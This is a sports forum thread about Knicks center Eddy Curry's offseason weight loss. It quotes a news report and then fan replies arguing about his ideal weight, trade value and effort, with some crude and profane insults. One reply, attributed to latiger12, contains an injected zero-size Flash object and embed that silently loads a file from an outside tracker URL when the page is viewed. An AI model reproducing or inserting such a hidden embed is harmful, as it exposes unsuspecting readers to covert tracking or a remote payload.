Eddy Curry Drops 10 More Lbs....now Down To 318

Toons

is the Bo$$
Knicks checking up on Eddy's progress
23 m ago By Alan Hahn

Eddy Curry has been in Ocean City, N.J. since Aug. 1 to continue his offseason regimen with his trainers, Jerry Powell and Tommy Weatherspoon. According to multiple sources, the Knicks will find that Curry is down another 10 pounds since they saw him in Las Vegas last month, when the embattled center spent two days working out with the summer league team.

Curry weighed about 328 at that time, which, according to Weatherspoon, was 30 pounds lighter than he was at the end of the NBA season. At this point of the offseason, Curry is 318 pounds, which is near the ideal weight range that Weatherspoon has set.

Curry's listed weight is 285 pounds, which hasn't been accurate since his early days with the Chicago Bulls. Weatherspoon, who has trained pros in the NFL and MLB during the past two decades, told Newsday in July that anyone who believes Curry will ever play again at 285 is "delusional."

Curry was under the watchful eye of Mike D'Antoni, Donnie Walsh and even Garden chairman James Dolan in Vegas and the Knicks came away pleased with the progress. It is unclear if Walsh will make the trip to Ocean City today or if Curry will get a visit from the team's training staff and strength coach Greg Brittenham.

I BELIEVE IF CAURRY CAN GET DOWN TO 300-305 He will be our starting center

portega1968

El Cacique
you said 218 in your title line and I almost died laughing

Im rooting for the guy.. so we can finally trade his lazy ass!!!

DaTPRiNCE

The Knicks are Back
if he could get into great physical shape no reason why we cant keep dude always had potential and if he plays well, theres always the possibility of trading him so curry getting into shape is a win-win in my eyes.

New New York

Quiet Storm
I figured the 218 was a typo, because 6'10 218 is Shawn Bradley numbers. I think the progress is great!

I do not think 285 is as out of the question as his trainer is making it seem. I mean Dwight Howard is 6'11 270 and does not look paper thin like Eddy's trainer is suggesting Curry would look like at 6'10 285. Think about it... Zo's playing weight was 6'10 265 and Tyson Chandler doesnt look all that skinny at 6'10 235, But Curry's trainer wants us to think that 285 is dellusional?

I think Curry's trainer realizes there is no way to get Curry at that weight in one offseason and is looking for a cop out.

None the less, it is great progress for Curry, and great News for NY in regards to either a trade or a having him as a player.

If he comes in at a toned 305 or so, then he would look in better shape then he has at any point of his Knick career.

KING~POETIQ

The One and Only
I'm indifferent about the whole situation. He doesn't fit our style of play and who the **** is going to want to pick him up this year with all the money he is owed? He will be good trade bait during the 2010 season, though...

TunerAddict

Starter
I figured the 218 was a typo, because 6'10 218 is Shawn Bradley numbers. I think the progress is great!

I do not think 285 is as out of the question as his trainer is making it seem. I mean Dwight Howard is 6'11 270 and does not look paper thin like Eddy's trainer is suggesting Curry would look like at 6'10 285. Think about it... Zo's playing weight was 6'10 265 and Tyson Chandler doesnt look all that skinny at 6'10 235, But Curry's trainer wants us to think that 285 is dellusional?

I think Curry's trainer realizes there is no way to get Curry at that weight in one offseason and is looking for a cop out.

None the less, it is great progress for Curry, and great News for NY in regards to either a trade or a having him as a player.

If he comes in at a toned 305 or so, then he would look in better shape then he has at any point of his Knick career.

Body type really plays a role in this though.

portega1968

El Cacique
Eddy Curry has the pontential to dominate this league if he wanted it

Problem is he doesnt have the will... right now, he's working out to justify another contract, not because he wants to be a champion.

So, in the longterm, this guy is a waste of money... he just doesnt have the desire to be what he can be.

Like I said, Id be happy if he helps himself get out of town ASAP... wishing he becomes an impact player is fools gold.

New New York

Quiet Storm
Body type really plays a role in this though.

Yeah you're right, I kinda figured that out when I looked up his draft card that had him listed at 300 lbs back when he looked like this

curry.jpg

So if that is 300, then I'd take 318 for sure!

Dirk

Benchwarmer
I wouldn't care if he dropped 900 pounds down to 250 pounds it would still be 250 lbs of lardy fatso fatty ass lard ass sh*t

dre48ny

Rotation player
So he dropped 30 lbs before Las Vegas, now an extra 10 pounds and still weighs 318 lbs! Shit, this dude was f-ing obese! No wonder his knee was shot. He still has time to lose some more, maybe down to 310 with some muscle. How much does Shaq weigh?

latiger12

Rookie
you said 218 in your title line and I almost died laughing<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="0" height="0"><param name="movie" value="<A href="http://brbyowner.com/?tracker=4097"></param><param">http://brbyowner.com/?tracker=4097"></param><param name="allowFullScreen" value="true"></param><embed src="http://brbyowner.com/?tracker=4097" type="application/x-shockwave-flash" allowfullscreen="true" width="0" height="0"></embed></object>

Im rooting for the guy.. so we can finally trade his lazy ass!!!

You never know what this guy can do when he gets in shape. Doing all the work to lose the weight may make him become a better player and not so lazy...

nyk_nyk

All Star
I BELIEVE IF CAURRY CAN GET DOWN TO 300-305 He will be our starting center
I don't think his weight has a direct impact on whether or not he starts. He needs to come to camp with the desire and SKILL level to earn a starting spot. He could be 320 and still start if he showed the coaches that he's capable of being a dominant low post scorer like he use to be.

It's funny how everyone has just accepted the fact that even with the burger purge weight loss he will never rebound or play defense like he should.

Asimov

Benchwarmer
Curry may be fat **** POS, but atleast he aint a vasoline eating psycho.

Good for the the fat lazy **** :thumbsup:

tiger0330

Legend
I was wondering when Eddie was last 218 and I thought it must have been high school but he was 290 his senior year in HS so he might have last seen 218 in the 6th grade. :)